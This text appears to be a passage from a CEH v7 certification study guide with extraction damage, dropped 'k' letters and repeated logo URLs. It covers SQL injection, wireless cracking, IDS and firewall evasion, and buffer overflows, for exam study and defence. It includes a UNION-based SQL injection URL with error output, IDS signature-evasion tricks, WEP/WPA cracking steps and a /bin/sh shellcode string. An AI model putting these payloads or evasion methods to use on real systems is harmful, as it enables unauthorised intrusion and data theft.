. Validate and Sanitize Input . Safely handle different encoding schemes . Low privilege accounts for DB connection . Custom error messages so there isn t a mess of information available to average users . Validate redirects and forwards, avoid using them at all . No session data in GET and POST . Secure coo ies and do not store sensitive info in plain text . Least amount of information about services on a server as possible
Web Application Firewalls A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attac s such as Cross-sit e Scripting (XSS) and SQL Injection. By customizing the rules to your application, many atta c s can be identified and bloc ed. The effort to perform this customization can be significant and needs t o be maintained as the
application is modified.
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Web Application Pen Testing Web application penetration testing refers to a set of services used to detect v arious security issues with web applications and identify vulnerabilities and ris s, including: . Known vulnerabilities in COTS (Commercial Off The Shelf) applications . Technical vulnerabilities: URL manipulation, SQL injection, cross-site scripti ng, bac -end authentication, password in memory, session hijac ing, buffer overflow, web serv er configuration, credential management, Clic jac ing, etc, . Business logic errors: Day-to-Day threat analysis, unauthorized logins, person al information modification, pricelist modification, unauthorized funds transfer, breach of cus tomer trust etc. OWASP, the Open Web Application Security Project, an open source web application security documentation project, has produced documents such as the OWASP Guide and the wi dely adopted OWASP Top 10 awareness document.
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Module 14 SQL Injection Study Guide Objectives: . . . . . . . . Introduction to SQL Injection Types of SQL Injection SQL Injection Methodology Common SQL Injection Advanced SQL Injection SQL Injection Tools Signature Evasion Techniques Defending Against SQL Injection
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Introduction to SQL Injection SQL injection is the most common enemy. The vulnerability in SQL injection is th at data is not validated before it is sent to the database. SQL injections occur when untrusted data is s ent to an interpreter as part of a command or query. The attac er s hostile data can tric the interpreter into executing unintended commands or accessing unauthorized data. This allows for a significan t bypassing of security measures. This is a specific version of an injection attac identified in module 13. A successful SQL injection can lead to information theft and tampering, as well as possible Denia l of Service attac s Critical Concepts Server Side Technologies ASP.Net and relational Databases such as SQL Server, Oracle, IBM DB2 and MySQL a re all server side technologies that are susceptible to SQL injection attac s. It is not a mat ter of specific vulnerabilities in the software but the way they are implemented to create dynam ic content without data validation. HTTP Post Request When the HTTP Post method is used to send data to the server, this string is vis ible as the HTTP address in vulnerable implementations. This data is used to create the SQL query , and when changed the SQL injection SQL commands and logic A common login method is to match a username and password. In a legitimate inter action these two bits of data are loo ed up in a table, if the user s input data matches the data found in the table the user is considered authenticated. The authentication occurs becaus e logically, the matching data creates a TRUE condition. In a vulnerable implementation, entering another TRUE condition such as 1=1 and then a to comment out the rest of the SQL request will also allow for an authentication. Using this logic a hac er can use true conditions to then edit the table, add re cords, display records, or just delete the table.
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Informative Error Messages Error messages are used to correct issues with a database query. When these erro rs are displayed to a hac er they can be used to get important information such as tabl e names, user names, passwords, and even more sensitive information. One method is to use the UNION command to combine two types of data that cannot be combined, such as a string of characters and an integer. This will produce an er ror that tells you what data could not be combined. For Example: http://duc /index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'-Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarc har value 'admin_login' to a column of data type int. /index.asp, line 5 The matching patent, '%25login%25' will be seen as %login% in SQL Server. In thi s case, we will get the first table name that matches the criteria, "admin_login". Using this type of commands and patience almost any information can be uncovered .
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Types of SQL Injection Attac Stored Procedure Using stored procedures does not necessarily prevent SQL injection. The importan t thing to do is use parameters with stored procedures. If you do not use parameters, your stored pro cedures can be susceptible to SQL injection if they use unfiltered input Union Query Using UNION to return information desired. Tautology A Tautology is a statement that is always true such as 1=1. Injecting these stat ements along with an OR logically creates a statement that is true ma ing the SQL injection wor . End of Line comment Using or other commenting characters to nullify legitimate code suffixed onto the attac code. Blind SQL Injection When a target does not provide informative error messages, they may still be sus ceptible to attac . Hac ing when receiving a generic or customer error message requires Blind SQL in jection techniques. This requires more time and patience to uncover information. Injecting a request with the WAITFOR DELAY command and a 10 second sleep will te ll a hac er if their command was accepted if the page then delays in its processing. BENCHMARK is ano ther such command. Blind SQL Injection wor s by as ing a series of Yes or No questions and using that information to construct an understanding of the target.
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg SQL Injection Methodology 1. Gather Information 2. Detect vulnerabilities a. This is done by injecting test queries such as
and
3. Preform Error based, Union based, or Blind SQL injections depending on vulner abilities and level of error reporting found. 4. Extract desired information 5. Interact with the OS a. Compromise the machine b. Execute commands or access system files
Common SQL Injection Hac ing Use SQL injection hac ing to grab passwords or hashes, create database accounts in a system, transfer an entire database to your machine, interact with the file system or operating s ystem, or perform networ reconnaissance. Advanced SQL Injection Hac ing Advanced Enumeration Recognize that different databases require different query types. The CEH test d oes not require you now which commands interact with each database type. Advanced Database interaction Using more specific SQL commands it is possible to grab stored password hashes t o be bro en offline. Another common interaction is to transfer the entire database to the attac ers m achine using standard port 80 traffic. Depending on the level of permissions of the database user it is also possible t o interact with the operating system. Examples of this include the LOAD_FILE command and the xp_cmds hell, which allow a file to be loaded to the database and viewed or interact with a command line t hrough the database.
6. Move on to compromise the networ
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg SQL Injection Tools
SQLninja Absinthe Signature Evasion Techniques Targets may be setup with an Intrusion Detection System that compares attac s to input strings of nown attac s to detect SQL injection attac s. To bypass this, you can obscure y our attac s in multiple ways. Using various forms of encoding you can evade an IDS by not exactly matching wha t they are loo ing for. IF an IDS is set to bloc attempts to inject 1=1 you can evade it by using 7=7 o r 7 >1. Some IDS can be evaded by encoding in HEX or using the CHAR function to represent characters. Dropping or adding whitespace [SPACE] can evade signatures as well, SQL queries do not always chec for whitespace, while an IDS usually will require an exact match. UNION SELECT a nd UNION SELECT will be read differently. Adding inline comments with the /* and */ to separate commands will also confuse most IDS s. String concatenation allows for commands to be entered in a shorthand form that the database can read. Concatenating these strings allows them to bypass rules in an IDS against the commands themselves being entered.
SQLsmac
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Defending Against SQL Injection Web Applications have the following vulnerabilities which require defending: The database server can run OS commands, because of this the database service a ccount needs to have minimal rights and commands that allow shell prompts and networ discovery shoul d be disabled. Error messages can be manipulated to reveal information in the database. To coun teract this error messages should be custom and suppressed whenever possible. Data must be validated before it goes to the server. Stored procedures can be us ed to process user input and provide a layer of protection. Data should not be concatenated if it h as not been validated. Removing nown bad information may not always wor as a validation process becau se of possible encoding techniques instead sanitize by removing everything but nown good infor mation.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Module 15 Wireless Networ s Study Guide Objectives:
. . . . . . . . . . . .
Wireless Networ s Types of Wireless Networ s Wi-Fi Authentication Modes Types of Wireless Encryption Wireless Threats Wireless Hac ing Methodology Wireless Hac ing Tools Bluetooth Hac ing Defending Against Bluetooth Hac ing Defending Against Wireless Attac s Wi-Fi Security Tools Wireless Pen Testing Framewor
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Wireless Networ s Wireless networ s broadcast data so that it can be received in a local area with out wires. These networ s are easier to install and scale to accommodate more users. These networ s are less secure by virtue of this greater functionality. Types of Wireless Networ s Wireless networ s are built on standards. These standards can be set with option s about authentication methods and encryption. Wireless Standards The 802.11x standards cover the development of the wireless spectrum for home an d business use. For the CEH you need to understand the difference in Megabit per second transmission rates and bandwidth used. 802.11a operates in the 5 GHz band with a maximum net data rate of 54 Mbit/s. 80 2.11b is built from the same standards and operates in the 2.4 GHz band with a maximum data rate of 11Mbit/s. 802.11g uses the 2.4GHz band at the data rate of 54 Mbit/s. 802.11n introduced Multiple In, Multiple Out (MIMO) increasing Mbit/s to 600 in the 5 GHz band. All of these standards are ma r eted under the name Wi-Fi. Bluetooth is a wireless standard for very short range transmission at a low band width. Bluetooth is utilized for low power devices such as cell phone hands free microphones, requir ing a close range under ten meters.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg WiFi Authentication Modes Open In open authentication, the signal is not encrypted and any device can authentic ate to the Access Point. Shared Key Clients use an encryption ey nown to the client and the Access Point to encryp t a challenge text sent from the access point to allow connection to the networ . Centralized A central server handles an authentication mechanism to allow clients onto the n etwor . The Access Point receives requests and as s for a response that includes an identity to pas s on to the central server such as a RADIUS server that then handles the actual authentication. Types of Wireless Encryption WEP Wired Equivalency Protocol is an older insecure encryption method. It uses small eys with flaws in implementation that ma e it trivial to brea using tools li e aircrac -ng. WPA Wi-Fi Protected Access corrects the flaws in WEP creating a new wireless standar d. Encryption is improved by using TKIP, Temporal Key Integrity Protocol, which creates a mechani sm for changing the ey used. WPA2 uses AES 128 bit encryption and CCMP for stronger encryption than its prede cessor. WPA2 Enterprise integrates with EAP standards for stronger authentication CCMP uses 128 bit eys and 48 bit initialization vectors, which is much better t han the WEP standard used for replay detection EAP stands for Extensible Authentication Protocol which allows multiple methods for authentication such as smart cards and to ens.
WEP Flaws WEP was implemented without public or academic review. The RC4 cipher used is de signed for one time message use, not to be used for multiple messages. This leads to the IV fra mes being repeated, and prone to being used in replay attac s. Tools such as aircrac allow for WEP to be crac ed with little technical nowledge. Brea ing WEP Encrypted Wireless Networ s Using aircrac -ng and a copy of Bac trac on a laptop with an injection capable wireless card is required for brea ing WEP encrypted networ s. The Wireless card is set into monitor mode. Using airodump-ng pac ets are captured to gain access to the IV pac ets. Aireplay-ng can be used t o do fa e authentications to generate traffic as well. Once enough pac ets are collected t he ey can be crac ed using aircrac -ng, and the ey can be replayed to gain access to the networ . Brea ing WPA Encrypted Wireless Networ s With WPA-PSK a Pre Shared Key is used to begin the TKIP encryption. While the pa c ets themselves are not crac able, this Pre-Shared Key can be brute forced. With access to the AP, y ou can capture an authentication pac et and use offline tools such as Rainbow Tables to crac the WPA ey offline. If there are live clients in range an attac er can force that client to disconnect. When they reconnect the authentication pac can be captured and attempt to brute force against that Pair wise Master Key (PMK). The PMK is what is used to begin the encrypted session between the access point and the client. Wireless Threats Access Control Attac s are used against AP MAC filters or port access controls b y spoofing MAC addresses or port addresses. Integrity Attac s are used by injecting data to replay a captured authentication to gain access. Also these attac s are used to facilitate other attac s such as Denial of Service. Confidentiality Attac s refer to attac s intercepting data that is assumed to be confidential.
Availability Attac s prevent legitimate use of a wireless networ preventing traffic from
or resource by
reaching it. Authentication Attac s aim to steal identity of clients by crac ing logins or sn iffing credentials.
Rogue Access Points Any access point setup to loo li e a legitimate member of the networ , but is u sed by a hac er to accomplish any of the attac s above.
Evil twin is a term for a rogue Wi-Fi access point that appears to be a legitima te hotspot offered on the premises, but actually has been set up by a hac er to eavesdrop on wireless comm unications among Internet surfers. An evil twin attac is the wireless version of the phishing scam. An attac er fo ols wireless users into connecting a laptop or mobile phone to a tainted hotspot by posing as a legitima te provider.
Wardriving Wardriving refers to driving around with a mobile Wi-Fi device loo ing for a WiFi signal. Cars driving around an area are common enough that they blend into the surroundings. Any meth od of travel can become a War vehicle. Warflying involves the use of a private, or in some cases a remote controlled, a ircraft with a Wi-Fi antenna mounted to it for the purpose of finding Wi-Fi signal. Warwal ing can be used in a small enough area, li e a college campus. Warchal ing is a method of documenting Wi-Fi networ s in public places. These ma r s often resemble graffiti. Finding a Wi-Fi signal can be aided by using different antennas. Omnidirectional antennas are common; they pic up signal from all around them. A directional antenna such as a Yagi o nly wor s in one direction, but is designed to have a much greater range in that direction than a n omnidirectional antenna would.
Evil Twin Attac
Wireless Hac ing Methodology Wi-Fi discovery can be passive by monitoring for traffic or active by sending pr obes out and getting responses. Using passive methods allows you to stay hidden for longer. Using act ive techniques will increase the chances of your attac s being discovered. However, active technique s will usually generate needed information faster. GPS Mapping is not always necessary for every job. Tools such as Netstumbler or WIGLE allow for automatic capturing of GPS data in the log. Wireless Traffic Analysis involves gathering of information such as SSIDs and en cryption methods to determine appropriate strategies for attac s. Some tools will automatically prov ide this data while monitoring, such as aircrac -ng. Launch a wireless attac after determining the appropriate methods. Depending on the networ , you may have to crac Wi-Fi Encryption before this, or you may be able access inform ation without this step. Wireless Hac ing Tools Tool Recommendation: Aircrac -ng is the most used Wi-Fi tool of our practice. Yo uTube videos and Google searches will turn up an amazing amount of information on how to run it a nd what is needed to use aircrac -ng. Bluetooth Hac ing Bluetooth hac ing ta es advantage of some flaws in the Bluetooth stac in order to compromise Bluetooth enabled devices. All Bluetooth hac ing requires a close proximity to t he device in question because of its limits. Terms of Bluetooth Hac ing Bluesmac ing is a DoS attac caused by random data pac ets being sent to the dev ice. Blue Snar ing is the theft of information from a Bluetooth device Bluejac ing refers to sending messages over Bluetooth to other Bluetooth devices . This is done
anonymously through the OBEX protocol.
Defending Against Bluetooth Hac ing If you eep Bluetooth disabled until you need it, you will minimize the window o f opportunity for a hac er to compromise your device. When not pairing, eeping your device in a non -discoverable mode is the best method for ensuring that the device does not broadcast information a bout itself. Lastly, encrypt data on the mobile device as a defense in depth measure should your devi ce be compromised. Defending Against Wireless Attac s Always assume that your wireless signal will be available outside of your intend ed wor area. Wireless signals handle networ traffic just li e a hub; the traffic is broadcast for any one in range with the right equipment. Special antennas can pic up a signal and broadcast from much further than standard wor space equipment. Hiding your SSID Broadcast and positioning your antennas ca n only do so much to limit your ris . These hiding techniques remove you from the low-hanging frui t category that hac ers loo for. By ensuring that your wireless networ is encrypted, and that your authenticatio n is implemented correctly, you can eep your traffic confidential. Ma e sure that your wireless networ is only being used by the devices and users that need to use it. If a client can be wired, the y are afforded a greater level of security. As with any other networ , be sure that your equipment does not use default pass words. Physical access to networ equipment can be used to bypass many networ security controls . Periodic sweeps loo ing for rogue access points that may have been plugged into your wired netwo r will avoid this problem. WiFi Security Tools Aircrac -ng Suite: All in one set of tools easily found in Bac trac . Our practi ce uses this tool as a beginning to end tool. It allows for sniffing of traffic, pac et capture, MAC ad dress capture, SSID and encryption method capture. After getting the information you need Aircrac provi des tools for brea ing
Kismet
encryption
eys and using the decrypted eys for replay attac s.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Kismet is a layer 2 wireless sniffer that wor s with most common wireless networ cards. Kismet identifies networ s by passively collecting pac ets and detecting standard named networ s, detecting hidden networ s, and inferring the presence of non-beaconing networ s via data t raffic.
Netstumbler Netstumbler is a tool that sniffs Wi-Fi signals and informs users if their wirel ess networ is properly configured. This tool can be set to play an audio tone when it finds networ s, w hich is great for Wardriving.
The penetration test of a wireless networ component begins with documenting wha t security is currently in place. After documenting the current state, the next step is to dis cover what vulnerabilities are available to exploit. Once a wireless device is discovered an auditor will d etermine what security is being used, such as WEP or WPA encryption. If the wireless networ is using up-to-date encryption methods, and it is implem ented in a secure manner, the auditor can then determine if the target would require an infeasible amount of time to brute force an opening. Once this is determined and documented, the report can b e created with the findings.
Wireless Pen Testing Framewor
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Module 16 Evading IDS, Firewalls and Honeypots Objectives: . . . . . . . . . . . . Intrusion Detection Systems (IDS) Ways to Detect an Intrusion Types of Intrusion Detection Systems Firewalls Types of Firewalls Firewall Identification Techniques Honeypots Types of Honeypots Evading IDS Evading Firewalls Countermeasures Firewall and IDS Penetration Testing
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Intrusion Detection Systems (IDS) An intrusion detection system analyzes data from a networ and compares that dat a against rules that have been configured. If the data does not match what the system expects it can raise an alarm. To analyze data an IDS has to be set to capture pac ets. To raise an alarm it has t o be configured with rules that trigger this response. Ways to Detect an Intrusion Signature Recognition Captured data is compared to signatures of possible attac s. This is also called misuse detection. Anomaly Detection
Protocol Anomaly Detection Instead of a baseline of networ traffic the expected behavior of protocols are used as a base. Anything outside of this expected behavior is considered an anomaly. Types of IDS Networ Based A device placed on the networ in promiscuous mode to listen for traffic and to dynamically inspect networ pac ets for suspicious and anomalous activity Host Based A host-based IDS monitors all or parts of the dynamic behavior and the state of a computer system Thin of HIDS as an agent that monitors whether anything or anyone, whether inte rnal or external, has circumvented the system's security policy. Log File Monitoring These systems collect log data and comb through it to hopefully reveal events af ter they occur
This IDS relies on having a baseline of what normal ce this is determined anything outside of that norm is an anomaly.
networ traffic loo s li e, on
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Intrusion Detection Tool: Snort Snort is an open source networ tool capable of firewall type pac et filtering, protocol analysis, and rules based logging. Snort is used for a variety of networ tas s. The CEH exam expects students to be familiar with Snort logs and functions, but not necessarily exact commands.
File Integrity chec ing
Any of these ID systems may be wrapped into another piece of equipment such as a firewall or networ gateway. Indications of Intrusions 1. 2. 3. 4. 5. New files that are unfamiliar Repeated probes of machines and services Connections from unusual locations Gaps in system log file accounting System crashes or reboots
Unfortunately, these indications can also be signs of user activity and accident s. Firewalls A firewall is a pac et filter between networ s. Commonly they are used to eep i nternet traffic on one side of the wall and internal traffic on the other side. Firewalls may filter tr affic based on port, source or destination address, or type of traffic. Firewall Architecture Bastion Host A bastion host is a special purpose computer on a networ specifically designed and configured to withstand attac s. It is configured to have a public interface connected to the Internet and a private one connected to the internal networ . A bastion host is a computer that is fully exposed to attac . The system is on t he public side of the demilitarized zone (DMZ), unprotected by a firewall or filtering router. Frequen tly the roles of these systems are critical to the networ security system.
Compares files against a record of what the file is supposed to loo itor if files have been changed by intruders.
li e to mon
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg There are two common networ configurations that include bastion hosts and their placement. The first requires two firewalls, with bastion hosts sitting between the first "outside wo rld" firewall, and an inside firewall, in a demilitarized zone (DMZ). Often smaller networ s do not have mult iple firewalls, so if only one firewall exists in a networ , bastion hosts are commonly placed outside the firewall. Screened Subnet A screened subnet firewall can be used to separate components of the firewall on to separate systems, for speed and organizational purposes. This requires at least three interfaces, public, private, and mixed. As each component system of the screened subnet firewall needs to implement only a specific tas , each system is less complex to configure. A screened subnet firewall is often used to establish a demilitarized zone (DMZ) . The DMZ houses resources that are available to the public, such as web servers. This allows the private systems to be ept behind a separate networ interface
Multi-homed Firewall Multi-homed equipment allows for more zone creation to eep sections of the inte rnal networ from connecting or for allowing the DMZ to be more specifically divided up. Types of Firewalls Firewalls are categorized by what level of the OSI model at which they operate. Pac et Filtering Firewall These firewalls wor at the networ level. Typically, they are paired with a net wor router to compare pac ets with criteria and then discard or route the pac et in question depending on the criteria it matches. These may allow for further rule customization such as addresses, ports , or protocols involved. Circuit Level Gateway Firewall This type of firewall operates at the Session Level of the OSI model. These gate ways monitor traffic for TCP handsha e information and determine whether or not the session is allowed. T hey do not filter individual pac ets.
Application Level Firewall There firewalls operate at the Application layer of the OSI model. Only allowed applications are able to pass traffic through this system. The high level filtering allows for applicatio n specific filtering. Stateful Multilayer Inspection Firewall This is a combination of firewall types that filters at all of the above firewal l types levels. Firewall Identification Techniques Firewalls can be identified by how they act. All Firewalls involve using a set o f rules, rules create patterns, and patterns can be exploited by Hac ers. Some firewalls have a signat ure of what ports they listen on, they are revealed by port scanning. Firewal ing is a method of using Time to Live of TCP or UDP pac ets to determine if a target allows traffic through to a hop on the other side. Which pac ets are forwarded and give a TTL exceeded in transit message inform a hac er what pac ets are being passed onto the networ . Banner grabbing using FTP, Telnet, SMTP or http ports is another method of ident ifying services, if the banner has been left as a default. Honeypots Honeypots are systems that are configured to loo li e production systems to att ract possible intruders. Any activity on this otherwise unused system would be a sign of a hac er ta ing a loo around. However, as a hac er, when you encounter a system that appears to be open to eve rything you want to access, you are probably in a Honeypot and therefore will leave it alone. Types of Honeypots Honeypots can be classified based on their deployment and based on their level o f involvement. Based on the deployment, honeypots may be classified as: Production honeypots are easy to use, capture only limited information, and are used primarily by companies or corporations; Production honeypots are placed inside the production networ with other production servers by an organization to improve their overall state of security .
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Research honeypots are run by a volunteer, non-profit research organization or a n educational institution to gather information about the motives and tactics of the crac er c ommunity targeting different networ s. Research honeypots are complex to deploy and maintain, capture extensi ve information, and are used primarily by research, military, or government organizations. Based on the design criteria, honeypots can be classified into three categories as 1. pure honeypots 2. high interaction honeypots 3. low interaction honeypots Pure honeypot is a full production system. The activities of the attac er are mo nitored using a casual tap installed on the honeypot s lin to the networ . High interaction honeypots imitate the activities of the real systems that host a wide variety of services and, therefore, an attac er may be allowed a lot of services to waste his/her ti me. If virtual machines are not available, each honeypot needs to be maintained for each physical computer, which can be very expensive Low interaction honeypots are based on the services that the attac er normally r equests. There are many positives with the requirement of only few services by the attac ers which means low overhead and simple configuration. Example:Honeyd. Honeyto ens are honeypots that are not computer systems. Their value lies not in their use, but in their abuse. Honeyto ens can exist in almost any form, from a fa e account to a databa se entry that would only be selected by malicious queries, ma ing the concept ideally suited to ensu ring data integrity any use of them is inherently suspicious if not necessarily malicious. In general, they don't necessarily prevent any tampering with the data, but inst ead give the administrator a further measure of confidence in the data integrity.
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Evading Intrusion Detection Systems IDS s are susceptible to multiple evasion techniques and are even capable of being used to attac a target. By creating a Denial of Service a hac er can consume resources of the ID S to the point that it is unable to log an actual attac . DoS may also be used to bring the IDS offline, a llowing for the networ to be unprotected during the intended attac . Because an IDS uses specific rules to identify attac s any method used to encode or hide the attac may be successful, such as encoding in Unicode, or using encrypted channels. If the rules require an exact match of data, causing the dat a to loo different will not set off an alarm. Fragmentation attac s ta e advantage of a configuration in reassembly where the victim has a longer timeout for fragments than the IDS does. The IDS is unable to assemble the fragm ented attac in the window of time allowed by its rule, and so passes on the pac ets, but the victim has longer to reassemble and does so. Invalid RST pac ets may be used to tric IDS into believe a session has ended, b ut eep a communication alive. TCP uses chec sums to ensure communication is reliable, if this chec sum is wrong it will throw a pac et out. When an IDS sees the RST pac et with an invalid chec sum it does not discard it and assumes a session is over. The victim does see the chec sum as invalid and disca rds the RST pac et, eeping the communication going. Application layer attac s depend upon an IDS being unable to chec in a compress ed file format use as images or video pac ets. Any flood of data can be used to bury an attac within a wall of log data that o ften goes unread or unanalyzed. Evading Firewalls By spoofing an IP address that is trusted by the target firewall, a hac er can g ain access just li e the actual spoofed machine By as ing for information in a method the firewall does not expect you can gain access to data the firewall would normally bloc . For example, if a firewall is configured to bloc http access to
www.faceboo .com but you ping www.faceboo .com to find that it is hosted at 69.1 71.228.39 and put that number in your web browser, the firewall does not see that as as ing for th e same information. Creating a tunnel through accepted protocols can also bypass most firewall restr ictions. ICMP, HTTP, and other standard communications can be used to create a tunnel that is then se en by the firewall as accepted communication.
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Countermeasures IDS s and Firewalls live and die by their rules and signatures. Always eep the si gnatures and software up to date to avoid being victim to an already patched exploit or a signature th at was available. Ensure that your settings allow of the IDS to see fragmented data exactly as the end cl ient will see it. Rules need to be set to account for the ability of information to be as ed for and sen t in multiple encoding methods.
Firewall/IDS Penetration Testing Testing of firewalls and Intrusion Detection Systems is a matter of finding if t he rules involve account for the methods that may be used to bypass their protection. If the rules eep out t he attac , then the system is considered secure.
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg
Module 1 7 Buffer Overflows Study Guide Objectives:
. . . . . . . . . . . .
Buffer Overflows Stac -Based Buffer Overflow Heap-Based Buffer Overflow Stac Operation Buffer Overflow Steps Attac ing a Real Program Smashing the Stac Identifying Buffer Overflows BoF Detection Tools Defense against Buffer Overflows BoF Countermeasure Tools BoF Pen Testing
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Buffer Overflows Programs utilize memory to wor . They store information in allocated memory. The se allocations are usually created to fit a certain number of bytes in data. When the information t hat is placed in memory is more bytes than the space that was allocated you have a buffer overflow or bu ffer overrun. This overwrites whatever comes next in the memory. If a critical piece of data is ove rwritten the program crashes. This can be as simple as a program expecting to receive a 10 digit phon e number but a command li e strcpy placing 11 bits in the memory space, crashing the program. Stac Based Buffer Overflow The stac or call stac is a section of memory used to eep trac of subroutines in a computer program. The Stac Based Buffer overflow attac s this structure to over write data or int roduce commands to ma e the program function in ways the programmer did not intend. HeapBased Buffer Overflow The heap is an area in memory dynamically created when the program is run. This data is corrupted by a Heap Based Overflow to alter the structure of the heap to run malicious code Stac Operation Shellcode Exploits for Buffer overflows utilize Shellcode. These bits of assembly level pr ogramming language are written to cause the buffer overflows and give a hac er a measure of control. Fo r the CEH test be able to identify shellcode such as this: /* This is the minimal shellcode from the tutorial */ static char shellcode[]= "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg No Operations Most CPU s have a No Operation instruction, or NOP. This instruction tells a proce ssor not to process the following code until it gets to a certain Pointer in the program. A long str ing of these instructions can be placed into an exploit, which is called a NOP sled. The NOP sled is often encoded to loo li e something else, but recognizing 0x90 as a standard NOP is recommended. Knowledge Required to Create a Buffer Overflow Exploit To create a Buffer Overflow the hac er has to have an understanding of the under lying structures such as stac and heap memory processes, system calls at the machine code level, asse mbly level programing, and nowledge of debugging tools and how higher level programming la nguages convert into lower level languages. Knowledge Required to Run a Created Exploit If a piece of software has a nown Buffer Overflow issue there may already be an exploit tool available. Anyone who can find the tool and the vulnerable software in use can run the expl oit.
Identifying Buffer Overflow Vulnerabilities Identifying these vulnerabilities is generally done by code review and manual te sting. Debugging software such as Ollydbg can be used to generate malformed input in programs and watch exactly how the Stac or Heap handles the problem
In general, a Buffer Overflow allows a hac er to control where the program loo s for information in the stac and point it to code they want to run. This is nown as smashing the stac . After the stac is smashed the hac er has the same privileges as the process, and then gain super u ser access. It is also possible to create bac doors using inetd or Trivial FTP, or ma e connections usi ng netcat
Smashing the Stac
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Preventing Buffer Overflow Attac s The prevention of Buffer Overflow attac s comes from having programmers who are familiar with what can happen when the stac or heap is left open to these vulnerabilities. By usin g safe languages or ma ing sure not to use unsafe functions in languages you can prevent many common overflows. By having a strong code review process after the code is written you can find possi ble crac s. Data Execution Prevention (DEP)
Buffer Overflow Penetration Testing If the source code is available, reviewing the code for insecure function calls. If the source code is not available reverse engineering is possible using disassemblers and debugging tool s. The process for using the debugger involves sending the code large amounts of input data and watching how the code handles it. Understanding the programing involved is required. As always, documentation of all the findings is critical to a good penetration test
DEP is a set of hardware and software technologies that wor and verify in real time if they are using system memory in a safe manner.
to monitor programs
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Module 18 Cryptography Study Guide Objectives: . . . . . . . . Introduction and Definitions Types of Cryptography Ciphers Algorithms Message Hashes / Digest Public Key Infrastructure (PKI) Dis Encryption Cryptography Attac s
